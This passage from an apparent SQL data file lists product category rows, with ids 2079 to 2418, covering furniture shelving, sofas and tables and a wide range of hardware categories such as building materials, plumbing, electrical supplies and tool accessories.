(2079, 2079, 0, 'Furniture > Shelving > Wall Shelves & Ledges'),
(2080, 2080, 0, 'Furniture > Shelving Accessories'),
(2081, 2081, 0, 'Furniture > Shelving Accessories > Replacement Shelves'),
(2082, 2082, 0, 'Furniture > Sofa Accessories'),
(2083, 2083, 0, 'Furniture > Sofa Accessories > Chair & Sofa Supports'),
(2084, 2084, 0, 'Furniture > Sofa Accessories > Sectional Sofa Units'),
(2085, 2085, 0, 'Furniture > Sofas'),
(2086, 2086, 0, 'Furniture > Table Accessories'),
(2087, 2087, 0, 'Furniture > Table Accessories > Table Legs'),
(2088, 2088, 0, 'Furniture > Table Accessories > Table Tops'),
(2089, 2089, 0, 'Furniture > Tables'),
(2090, 2090, 0, 'Furniture > Tables > Accent Tables'),
(2091, 2091, 0, 'Furniture > Tables > Accent Tables > Coffee Tables'),
(2092, 2092, 0, 'Furniture > Tables > Accent Tables > End Tables'),
(2093, 2093, 0, 'Furniture > Tables > Accent Tables > Sofa Tables'),
(2094, 2094, 0, 'Furniture > Tables > Activity Tables'),
(2095, 2095, 0, 'Furniture > Tables > Folding Tables'),
(2096, 2096, 0, 'Furniture > Tables > Kitchen & Dining Room Tables'),
(2097, 2097, 0, 'Furniture > Tables > Kotatsu'),
(2098, 2098, 0, 'Furniture > Tables > Nightstands'),
(2099, 2099, 0, 'Furniture > Tables > Poker & Game Tables'),
(2100, 2100, 0, 'Furniture > Tables > Sewing Machine Tables'),
(2101, 2101, 0, 'Hardware'),
(2102, 2102, 0, 'Hardware > Building Consumables'),
(2103, 2103, 0, 'Hardware > Building Consumables > Chemicals'),
(2104, 2104, 0, 'Hardware > Building Consumables > Chemicals > Acid Neutralizers'),
(2105, 2105, 0, 'Hardware > Building Consumables > Chemicals > Ammonia'),
(2106, 2106, 0, 'Hardware > Building Consumables > Chemicals > Chimney Cleaners'),
(2107, 2107, 0, 'Hardware > Building Consumables > Chemicals > Concrete & Masonry Cleaners'),
(2108, 2108, 0, 'Hardware > Building Consumables > Chemicals > De-icers'),
(2109, 2109, 0, 'Hardware > Building Consumables > Chemicals > Deck & Fence Cleaners'),
(2110, 2110, 0, 'Hardware > Building Consumables > Chemicals > Drain Cleaners'),
(2111, 2111, 0, 'Hardware > Building Consumables > Chemicals > Electrical Freeze Sprays'),
(2112, 2112, 0, 'Hardware > Building Consumables > Chemicals > Lighter Fluid'),
(2113, 2113, 0, 'Hardware > Building Consumables > Chemicals > Septic Tank & Cesspool Treatments'),
(2114, 2114, 0, 'Hardware > Building Consumables > Hardware Glue & Adhesives'),
(2115, 2115, 0, 'Hardware > Building Consumables > Hardware Tape'),
(2116, 2116, 0, 'Hardware > Building Consumables > Lubricants'),
(2117, 2117, 0, 'Hardware > Building Consumables > Masonry Consumables'),
(2118, 2118, 0, 'Hardware > Building Consumables > Masonry Consumables > Bricks & Concrete Blocks'),
(2119, 2119, 0, 'Hardware > Building Consumables > Masonry Consumables > Cement, Mortar & Concrete Mixes'),
(2120, 2120, 0, 'Hardware > Building Consumables > Masonry Consumables > Grout'),
(2121, 2121, 0, 'Hardware > Building Consumables > Painting Consumables'),
(2122, 2122, 0, 'Hardware > Building Consumables > Painting Consumables > Paint'),
(2123, 2123, 0, 'Hardware > Building Consumables > Painting Consumables > Paint Binders'),
(2124, 2124, 0, 'Hardware > Building Consumables > Painting Consumables > Primers'),
(2125, 2125, 0, 'Hardware > Building Consumables > Painting Consumables > Stains'),
(2126, 2126, 0, 'Hardware > Building Consumables > Painting Consumables > Varnishes & Finishes'),
(2127, 2127, 0, 'Hardware > Building Consumables > Plumbing Primer'),
(2128, 2128, 0, 'Hardware > Building Consumables > Protective Coatings & Sealants'),
(2129, 2129, 0, 'Hardware > Building Consumables > Solder & Flux'),
(2130, 2130, 0, 'Hardware > Building Consumables > Solvents, Strippers & Thinners'),
(2131, 2131, 0, 'Hardware > Building Consumables > Wall Patching Compounds & Plaster'),
(2132, 2132, 0, 'Hardware > Building Materials'),
(2133, 2133, 0, 'Hardware > Building Materials > Countertops'),
(2134, 2134, 0, 'Hardware > Building Materials > Door Hardware'),
(2135, 2135, 0, 'Hardware > Building Materials > Door Hardware > Door Bells & Chimes'),
(2136, 2136, 0, 'Hardware > Building Materials > Door Hardware > Door Closers'),
(2137, 2137, 0, 'Hardware > Building Materials > Door Hardware > Door Frames'),
(2138, 2138, 0, 'Hardware > Building Materials > Door Hardware > Door Keyhole Escutcheons'),
(2139, 2139, 0, 'Hardware > Building Materials > Door Hardware > Door Knobs & Handles'),
(2140, 2140, 0, 'Hardware > Building Materials > Door Hardware > Door Knockers'),
(2141, 2141, 0, 'Hardware > Building Materials > Door Hardware > Door Push Plates'),
(2142, 2142, 0, 'Hardware > Building Materials > Door Hardware > Door Stops'),
(2143, 2143, 0, 'Hardware > Building Materials > Door Hardware > Door Strikes'),
(2144, 2144, 0, 'Hardware > Building Materials > Doors'),
(2145, 2145, 0, 'Hardware > Building Materials > Doors > Garage Doors'),
(2146, 2146, 0, 'Hardware > Building Materials > Doors > Home Doors'),
(2147, 2147, 0, 'Hardware > Building Materials > Drywall'),
(2148, 2148, 0, 'Hardware > Building Materials > Flooring & Carpet'),
(2149, 2149, 0, 'Hardware > Building Materials > Glass'),
(2150, 2150, 0, 'Hardware > Building Materials > Handrails & Railing Systems'),
(2151, 2151, 0, 'Hardware > Building Materials > Hatches'),
(2152, 2152, 0, 'Hardware > Building Materials > Insulation'),
(2153, 2153, 0, 'Hardware > Building Materials > Lumber & Sheet Stock'),
(2154, 2154, 0, 'Hardware > Building Materials > Molding'),
(2155, 2155, 0, 'Hardware > Building Materials > Rebar & Remesh'),
(2156, 2156, 0, 'Hardware > Building Materials > Roofing'),
(2157, 2157, 0, 'Hardware > Building Materials > Roofing > Gutter Accessories'),
(2158, 2158, 0, 'Hardware > Building Materials > Roofing > Gutters'),
(2159, 2159, 0, 'Hardware > Building Materials > Roofing > Roof Flashings'),
(2160, 2160, 0, 'Hardware > Building Materials > Roofing > Roofing Shingles & Tiles'),
(2161, 2161, 0, 'Hardware > Building Materials > Shutters'),
(2162, 2162, 0, 'Hardware > Building Materials > Siding'),
(2163, 2163, 0, 'Hardware > Building Materials > Sound Dampening Panels & Foam'),
(2164, 2164, 0, 'Hardware > Building Materials > Staircases'),
(2165, 2165, 0, 'Hardware > Building Materials > Wall & Ceiling Tile'),
(2166, 2166, 0, 'Hardware > Building Materials > Wall Paneling'),
(2167, 2167, 0, 'Hardware > Building Materials > Weather Stripping & Weatherization Supplies'),
(2168, 2168, 0, 'Hardware > Building Materials > Window Hardware'),
(2169, 2169, 0, 'Hardware > Building Materials > Window Hardware > Window Cranks'),
(2170, 2170, 0, 'Hardware > Building Materials > Window Hardware > Window Frames'),
(2171, 2171, 0, 'Hardware > Building Materials > Windows'),
(2172, 2172, 0, 'Hardware > Fencing & Barriers'),
(2173, 2173, 0, 'Hardware > Fencing & Barriers > Fence & Gate Accessories'),
(2174, 2174, 0, 'Hardware > Fencing & Barriers > Fence Panels'),
(2175, 2175, 0, 'Hardware > Fencing & Barriers > Fence Pickets'),
(2176, 2176, 0, 'Hardware > Fencing & Barriers > Fence Posts & Rails'),
(2177, 2177, 0, 'Hardware > Fencing & Barriers > Garden Borders & Edging'),
(2178, 2178, 0, 'Hardware > Fencing & Barriers > Gates'),
(2179, 2179, 0, 'Hardware > Fencing & Barriers > Lattice'),
(2180, 2180, 0, 'Hardware > Fencing & Barriers > Safety & Crowd Control Barriers'),
(2181, 2181, 0, 'Hardware > Fuel Containers & Tanks'),
(2182, 2182, 0, 'Hardware > Hardware Accessories'),
(2183, 2183, 0, 'Hardware > Hardware Accessories > Brackets & Reinforcement Braces'),
(2184, 2184, 0, 'Hardware > Hardware Accessories > Cabinet Hardware'),
(2185, 2185, 0, 'Hardware > Hardware Accessories > Cabinet Hardware > Cabinet & Furniture Keyhole Escutcheons'),
(2186, 2186, 0, 'Hardware > Hardware Accessories > Cabinet Hardware > Cabinet Backplates'),
(2187, 2187, 0, 'Hardware > Hardware Accessories > Cabinet Hardware > Cabinet Catches'),
(2188, 2188, 0, 'Hardware > Hardware Accessories > Cabinet Hardware > Cabinet Doors'),
(2189, 2189, 0, 'Hardware > Hardware Accessories > Cabinet Hardware > Cabinet Knobs & Handles'),
(2190, 2190, 0, 'Hardware > Hardware Accessories > Casters'),
(2191, 2191, 0, 'Hardware > Hardware Accessories > Chain, Wire & Rope'),
(2192, 2192, 0, 'Hardware > Hardware Accessories > Chain, Wire & Rope > Bungee Cords'),
(2193, 2193, 0, 'Hardware > Hardware Accessories > Chain, Wire & Rope > Chains'),
(2194, 2194, 0, 'Hardware > Hardware Accessories > Chain, Wire & Rope > Pull Chains'),
(2195, 2195, 0, 'Hardware > Hardware Accessories > Chain, Wire & Rope > Ropes & Hardware Cable'),
(2196, 2196, 0, 'Hardware > Hardware Accessories > Chain, Wire & Rope > Tie Down Straps'),
(2197, 2197, 0, 'Hardware > Hardware Accessories > Chain, Wire & Rope > Twine'),
(2198, 2198, 0, 'Hardware > Hardware Accessories > Chain, Wire & Rope > Utility Wire'),
(2199, 2199, 0, 'Hardware > Hardware Accessories > Coils'),
(2200, 2200, 0, 'Hardware > Hardware Accessories > Concrete Molds'),
(2201, 2201, 0, 'Hardware > Hardware Accessories > Dowel Pins & Rods'),
(2202, 2202, 0, 'Hardware > Hardware Accessories > Drawer Slides'),
(2203, 2203, 0, 'Hardware > Hardware Accessories > Drop Cloths'),
(2204, 2204, 0, 'Hardware > Hardware Accessories > Filters & Screens'),
(2205, 2205, 0, 'Hardware > Hardware Accessories > Flagging & Caution Tape'),
(2206, 2206, 0, 'Hardware > Hardware Accessories > Gas Hoses'),
(2207, 2207, 0, 'Hardware > Hardware Accessories > Ground Spikes'),
(2208, 2208, 0, 'Hardware > Hardware Accessories > Hardware Fasteners'),
(2209, 2209, 0, 'Hardware > Hardware Accessories > Hardware Fasteners > Drywall Anchors'),
(2210, 2210, 0, 'Hardware > Hardware Accessories > Hardware Fasteners > Nails'),
(2211, 2211, 0, 'Hardware > Hardware Accessories > Hardware Fasteners > Nuts & Bolts'),
(2212, 2212, 0, 'Hardware > Hardware Accessories > Hardware Fasteners > Rivets'),
(2213, 2213, 0, 'Hardware > Hardware Accessories > Hardware Fasteners > Screw Posts'),
(2214, 2214, 0, 'Hardware > Hardware Accessories > Hardware Fasteners > Screws'),
(2215, 2215, 0, 'Hardware > Hardware Accessories > Hardware Fasteners > Threaded Rods'),
(2216, 2216, 0, 'Hardware > Hardware Accessories > Hardware Fasteners > Washers'),
(2217, 2217, 0, 'Hardware > Hardware Accessories > Hinges'),
(2218, 2218, 0, 'Hardware > Hardware Accessories > Hooks, Buckles & Fasteners'),
(2219, 2219, 0, 'Hardware > Hardware Accessories > Hooks, Buckles & Fasteners > Chain Connectors & Links'),
(2220, 2220, 0, 'Hardware > Hardware Accessories > Hooks, Buckles & Fasteners > Gear Ties'),
(2221, 2221, 0, 'Hardware > Hardware Accessories > Hooks, Buckles & Fasteners > Lifting Hooks, Clamps & Shackles'),
(2222, 2222, 0, 'Hardware > Hardware Accessories > Hooks, Buckles & Fasteners > Utility Buckles'),
(2223, 2223, 0, 'Hardware > Hardware Accessories > Lubrication Hoses'),
(2224, 2224, 0, 'Hardware > Hardware Accessories > Metal Casting Molds'),
(2225, 2225, 0, 'Hardware > Hardware Accessories > Moving & Soundproofing Blankets & Covers'),
(2226, 2226, 0, 'Hardware > Hardware Accessories > Pneumatic Hoses'),
(2227, 2227, 0, 'Hardware > Hardware Accessories > Post Base Plates'),
(2228, 2228, 0, 'Hardware > Hardware Accessories > Springs'),
(2229, 2229, 0, 'Hardware > Hardware Accessories > Tarps'),
(2230, 2230, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization'),
(2231, 2231, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization > Garden Hose Storage'),
(2232, 2232, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization > Tool & Equipment Belts'),
(2233, 2233, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization > Tool Bags'),
(2234, 2234, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization > Tool Boxes'),
(2235, 2235, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization > Tool Cabinets & Chests'),
(2236, 2236, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization > Tool Organizer Liners & Inserts'),
(2237, 2237, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization > Tool Sheaths'),
(2238, 2238, 0, 'Hardware > Hardware Accessories > Tool Storage & Organization > Work Benches'),
(2239, 2239, 0, 'Hardware > Hardware Accessories > Wall Jacks & Braces'),
(2240, 2240, 0, 'Hardware > Hardware Pumps'),
(2241, 2241, 0, 'Hardware > Hardware Pumps > Home Appliance Pumps'),
(2242, 2242, 0, 'Hardware > Hardware Pumps > Pool, Fountain & Pond Pumps'),
(2243, 2243, 0, 'Hardware > Hardware Pumps > Sprinkler, Booster & Irrigation System Pumps'),
(2244, 2244, 0, 'Hardware > Hardware Pumps > Sump, Sewage & Effluent Pumps'),
(2245, 2245, 0, 'Hardware > Hardware Pumps > Utility Pumps'),
(2246, 2246, 0, 'Hardware > Hardware Pumps > Well Pumps & Systems'),
(2247, 2247, 0, 'Hardware > Heating, Ventilation & Air Conditioning'),
(2248, 2248, 0, 'Hardware > Heating, Ventilation & Air Conditioning > Air & Filter Dryers'),
(2249, 2249, 0, 'Hardware > Heating, Ventilation & Air Conditioning > Air Ducts'),
(2250, 2250, 0, 'Hardware > Heating, Ventilation & Air Conditioning > HVAC Controls'),
(2251, 2251, 0, 'Hardware > Heating, Ventilation & Air Conditioning > HVAC Controls > Control Panels'),
(2252, 2252, 0, 'Hardware > Heating, Ventilation & Air Conditioning > HVAC Controls > Humidistats'),
(2253, 2253, 0, 'Hardware > Heating, Ventilation & Air Conditioning > HVAC Controls > Thermostats'),
(2254, 2254, 0, 'Hardware > Heating, Ventilation & Air Conditioning > Vents & Flues'),
(2255, 2255, 0, 'Hardware > Locks & Keys'),
(2256, 2256, 0, 'Hardware > Locks & Keys > Key Blanks'),
(2257, 2257, 0, 'Hardware > Locks & Keys > Key Caps'),
(2258, 2258, 0, 'Hardware > Locks & Keys > Key Card Entry Systems'),
(2259, 2259, 0, 'Hardware > Locks & Keys > Locks & Latches'),
(2260, 2260, 0, 'Hardware > Plumbing'),
(2261, 2261, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports'),
(2262, 2262, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Gaskets & O-Rings'),
(2263, 2263, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > In-Wall Carriers & Mounting Frames'),
(2264, 2264, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Nozzles'),
(2265, 2265, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Pipe Adapters & Bushings'),
(2266, 2266, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Pipe Caps & Plugs'),
(2267, 2267, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Pipe Connectors'),
(2268, 2268, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Plumbing Flanges'),
(2269, 2269, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Plumbing Pipe Clamps'),
(2270, 2270, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Plumbing Regulators'),
(2271, 2271, 0, 'Hardware > Plumbing > Plumbing Fittings & Supports > Plumbing Valves'),
(2272, 2272, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts'),
(2273, 2273, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Bathtub Accessories'),
(2274, 2274, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Bathtub Accessories > Bathtub Bases & Feet'),
(2275, 2275, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Bathtub Accessories > Bathtub Skirts'),
(2276, 2276, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Bathtub Accessories > Bathtub Spouts'),
(2277, 2277, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drain Components'),
(2278, 2278, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drain Components > Drain Covers & Strainers'),
(2279, 2279, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drain Components > Drain Frames'),
(2280, 2280, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drain Components > Drain Liners'),
(2281, 2281, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drain Components > Drain Openers'),
(2282, 2282, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drain Components > Drain Rods'),
(2283, 2283, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drain Components > Plumbing Traps'),
(2284, 2284, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drain Components > Plumbing Wastes'),
(2285, 2285, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Drains'),
(2286, 2286, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Faucet Accessories'),
(2287, 2287, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Faucet Accessories > Faucet Aerators'),
(2288, 2288, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Faucet Accessories > Faucet Handles & Controls'),
(2289, 2289, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Fixture Plates'),
(2290, 2290, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts'),
(2291, 2291, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Bathtub & Shower Jets'),
(2292, 2292, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Electric & Power Showers'),
(2293, 2293, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Shower Arms & Connectors'),
(2294, 2294, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Shower Bases'),
(2295, 2295, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Shower Columns'),
(2296, 2296, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Shower Doors & Enclosures'),
(2297, 2297, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Shower Heads'),
(2298, 2298, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Shower Walls & Surrounds'),
(2299, 2299, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Shower Parts > Shower Water Filters'),
(2300, 2300, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Sink Accessories'),
(2301, 2301, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Sink Accessories > Sink Legs'),
(2302, 2302, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories'),
(2303, 2303, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Ballcocks & Flappers'),
(2304, 2304, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Bidet Faucets & Sprayers'),
(2305, 2305, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Toilet & Bidet Seats'),
(2306, 2306, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Toilet Seat Covers'),
(2307, 2307, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Toilet Seat Lid Covers'),
(2308, 2308, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Toilet Tank Covers'),
(2309, 2309, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Toilet Tank Levers'),
(2310, 2310, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Toilet Tanks'),
(2311, 2311, 0, 'Hardware > Plumbing > Plumbing Fixture Hardware & Parts > Toilet & Bidet Accessories > Toilet Trim'),
(2312, 2312, 0, 'Hardware > Plumbing > Plumbing Fixtures'),
(2313, 2313, 0, 'Hardware > Plumbing > Plumbing Fixtures > Bathroom Suites'),
(2314, 2314, 0, 'Hardware > Plumbing > Plumbing Fixtures > Bathtubs'),
(2315, 2315, 0, 'Hardware > Plumbing > Plumbing Fixtures > Faucets'),
(2316, 2316, 0, 'Hardware > Plumbing > Plumbing Fixtures > Shower Stalls & Kits'),
(2317, 2317, 0, 'Hardware > Plumbing > Plumbing Fixtures > Sinks'),
(2318, 2318, 0, 'Hardware > Plumbing > Plumbing Fixtures > Sinks > Bathroom Sinks'),
(2319, 2319, 0, 'Hardware > Plumbing > Plumbing Fixtures > Sinks > Kitchen & Utility Sinks'),
(2320, 2320, 0, 'Hardware > Plumbing > Plumbing Fixtures > Toilets & Bidets'),
(2321, 2321, 0, 'Hardware > Plumbing > Plumbing Fixtures > Toilets & Bidets > Bidets'),
(2322, 2322, 0, 'Hardware > Plumbing > Plumbing Fixtures > Toilets & Bidets > Toilets'),
(2323, 2323, 0, 'Hardware > Plumbing > Plumbing Fixtures > Toilets & Bidets > Urinals'),
(2324, 2324, 0, 'Hardware > Plumbing > Plumbing Hoses & Supply Lines'),
(2325, 2325, 0, 'Hardware > Plumbing > Plumbing Pipes'),
(2326, 2326, 0, 'Hardware > Plumbing > Plumbing Repair Kits'),
(2327, 2327, 0, 'Hardware > Plumbing > Water Dispensing & Filtration'),
(2328, 2328, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > In-Line Water Filters'),
(2329, 2329, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Dispensers'),
(2330, 2330, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Dispensers > Drinking Fountains'),
(2331, 2331, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Dispensers > Water Chillers'),
(2332, 2332, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Distillers'),
(2333, 2333, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Filtration Accessories'),
(2334, 2334, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Filtration Accessories > Water Filter Cartridges'),
(2335, 2335, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Filtration Accessories > Water Filter Housings'),
(2336, 2336, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Softener Salt'),
(2337, 2337, 0, 'Hardware > Plumbing > Water Dispensing & Filtration > Water Softeners'),
(2338, 2338, 0, 'Hardware > Plumbing > Water Levelers'),
(2339, 2339, 0, 'Hardware > Plumbing > Water Timers'),
(2340, 2340, 0, 'Hardware > Plumbing > Well Supplies'),
(2341, 2341, 0, 'Hardware > Power & Electrical Supplies'),
(2342, 2342, 0, 'Hardware > Power & Electrical Supplies > Armatures, Rotors & Stators'),
(2343, 2343, 0, 'Hardware > Power & Electrical Supplies > Ballasts & Starters'),
(2344, 2344, 0, 'Hardware > Power & Electrical Supplies > Carbon Brushes'),
(2345, 2345, 0, 'Hardware > Power & Electrical Supplies > Circuit Breaker Panels'),
(2346, 2346, 0, 'Hardware > Power & Electrical Supplies > Conduit & Housings'),
(2347, 2347, 0, 'Hardware > Power & Electrical Supplies > Conduit & Housings > Electrical Conduit'),
(2348, 2348, 0, 'Hardware > Power & Electrical Supplies > Conduit & Housings > Heat-Shrink Tubing'),
(2349, 2349, 0, 'Hardware > Power & Electrical Supplies > Electrical Motors'),
(2350, 2350, 0, 'Hardware > Power & Electrical Supplies > Electrical Mount Boxes & Brackets'),
(2351, 2351, 0, 'Hardware > Power & Electrical Supplies > Electrical Plug Caps'),
(2352, 2352, 0, 'Hardware > Power & Electrical Supplies > Electrical Switches'),
(2353, 2353, 0, 'Hardware > Power & Electrical Supplies > Electrical Switches > Light Switches'),
(2354, 2354, 0, 'Hardware > Power & Electrical Supplies > Electrical Switches > Specialty Electrical Switches & Relays'),
(2355, 2355, 0, 'Hardware > Power & Electrical Supplies > Electrical Wires & Cable'),
(2356, 2356, 0, 'Hardware > Power & Electrical Supplies > Extension Cord Accessories'),
(2357, 2357, 0, 'Hardware > Power & Electrical Supplies > Extension Cords'),
(2358, 2358, 0, 'Hardware > Power & Electrical Supplies > Generator Accessories'),
(2359, 2359, 0, 'Hardware > Power & Electrical Supplies > Generators'),
(2360, 2360, 0, 'Hardware > Power & Electrical Supplies > Home Automation Kits'),
(2361, 2361, 0, 'Hardware > Power & Electrical Supplies > Phone & Data Jacks'),
(2362, 2362, 0, 'Hardware > Power & Electrical Supplies > Power Converters'),
(2363, 2363, 0, 'Hardware > Power & Electrical Supplies > Power Inlets'),
(2364, 2364, 0, 'Hardware > Power & Electrical Supplies > Power Inverters'),
(2365, 2365, 0, 'Hardware > Power & Electrical Supplies > Power Outlets & Sockets'),
(2366, 2366, 0, 'Hardware > Power & Electrical Supplies > Solar Energy Kits'),
(2367, 2367, 0, 'Hardware > Power & Electrical Supplies > Solar Panels'),
(2368, 2368, 0, 'Hardware > Power & Electrical Supplies > Voltage Transformers & Regulators'),
(2369, 2369, 0, 'Hardware > Power & Electrical Supplies > Wall Plates & Covers'),
(2370, 2370, 0, 'Hardware > Power & Electrical Supplies > Wall Socket Controls & Sensors'),
(2371, 2371, 0, 'Hardware > Power & Electrical Supplies > Wire Caps & Nuts'),
(2372, 2372, 0, 'Hardware > Power & Electrical Supplies > Wire Terminals & Connectors'),
(2373, 2373, 0, 'Hardware > Small Engines'),
(2374, 2374, 0, 'Hardware > Storage Tanks'),
(2375, 2375, 0, 'Hardware > Tool Accessories'),
(2376, 2376, 0, 'Hardware > Tool Accessories > Abrasive Blaster Accessories'),
(2377, 2377, 0, 'Hardware > Tool Accessories > Abrasive Blaster Accessories > Sandblasting Cabinets'),
(2378, 2378, 0, 'Hardware > Tool Accessories > Axe Accessories'),
(2379, 2379, 0, 'Hardware > Tool Accessories > Axe Accessories > Axe Handles'),
(2380, 2380, 0, 'Hardware > Tool Accessories > Axe Accessories > Axe Heads'),
(2381, 2381, 0, 'Hardware > Tool Accessories > Cutter Accessories'),
(2382, 2382, 0, 'Hardware > Tool Accessories > Cutter Accessories > Nibbler Dies'),
(2383, 2383, 0, 'Hardware > Tool Accessories > Drill & Screwdriver Accessories'),
(2384, 2384, 0, 'Hardware > Tool Accessories > Drill & Screwdriver Accessories > Drill & Screwdriver Bits'),
(2385, 2385, 0, 'Hardware > Tool Accessories > Drill & Screwdriver Accessories > Drill Bit Extensions'),
(2386, 2386, 0, 'Hardware > Tool Accessories > Drill & Screwdriver Accessories > Drill Bit Sharpeners'),
(2387, 2387, 0, 'Hardware > Tool Accessories > Drill & Screwdriver Accessories > Drill Chucks'),
(2388, 2388, 0, 'Hardware > Tool Accessories > Drill & Screwdriver Accessories > Drill Stands & Guides'),
(2389, 2389, 0, 'Hardware > Tool Accessories > Drill & Screwdriver Accessories > Hole Saws'),
(2390, 2390, 0, 'Hardware > Tool Accessories > Driver Accessories'),
(2391, 2391, 0, 'Hardware > Tool Accessories > Flashlight Accessories'),
(2392, 2392, 0, 'Hardware > Tool Accessories > Grinder Accessories'),
(2393, 2393, 0, 'Hardware > Tool Accessories > Grinder Accessories > Grinding Wheels & Points'),
(2394, 2394, 0, 'Hardware > Tool Accessories > Hammer Accessories'),
(2395, 2395, 0, 'Hardware > Tool Accessories > Hammer Accessories > Air Hammer Accessories'),
(2396, 2396, 0, 'Hardware > Tool Accessories > Hammer Accessories > Hammer Handles'),
(2397, 2397, 0, 'Hardware > Tool Accessories > Hammer Accessories > Hammer Heads'),
(2398, 2398, 0, 'Hardware > Tool Accessories > Industrial Staples'),
(2399, 2399, 0, 'Hardware > Tool Accessories > Jigs'),
(2400, 2400, 0, 'Hardware > Tool Accessories > Magnetizers & Demagnetizers'),
(2401, 2401, 0, 'Hardware > Tool Accessories > Mattock & Pickaxe Accessories'),
(2402, 2402, 0, 'Hardware > Tool Accessories > Mattock & Pickaxe Accessories > Mattock & Pickaxe Handles'),
(2403, 2403, 0, 'Hardware > Tool Accessories > Measuring Tool & Sensor Accessories'),
(2404, 2404, 0, 'Hardware > Tool Accessories > Measuring Tool & Sensor Accessories > Electrical Testing Tool Accessories'),
(2405, 2405, 0, 'Hardware > Tool Accessories > Measuring Tool & Sensor Accessories > Gas Detector Accessories'),
(2406, 2406, 0, 'Hardware > Tool Accessories > Measuring Tool & Sensor Accessories > Measuring Scale Accessories'),
(2407, 2407, 0, 'Hardware > Tool Accessories > Measuring Tool & Sensor Accessories > Multimeter Accessories'),
(2408, 2408, 0, 'Hardware > Tool Accessories > Mixing Tool Paddles'),
(2409, 2409, 0, 'Hardware > Tool Accessories > Paint Tool Accessories'),
(2410, 2410, 0, 'Hardware > Tool Accessories > Paint Tool Accessories > Airbrush Accessories'),
(2411, 2411, 0, 'Hardware > Tool Accessories > Paint Tool Accessories > Paint Brush Cleaning Solutions'),
(2412, 2412, 0, 'Hardware > Tool Accessories > Paint Tool Accessories > Paint Roller Accessories'),
(2413, 2413, 0, 'Hardware > Tool Accessories > Power Tool Batteries'),
(2414, 2414, 0, 'Hardware > Tool Accessories > Power Tool Chargers'),
(2415, 2415, 0, 'Hardware > Tool Accessories > Router Accessories'),
(2416, 2416, 0, 'Hardware > Tool Accessories > Router Accessories > Router Bits'),
(2417, 2417, 0, 'Hardware > Tool Accessories > Router Accessories > Router Tables'),
(2418, 2418, 0, 'Hardware > Tool Accessories > Sanding Accessories'),
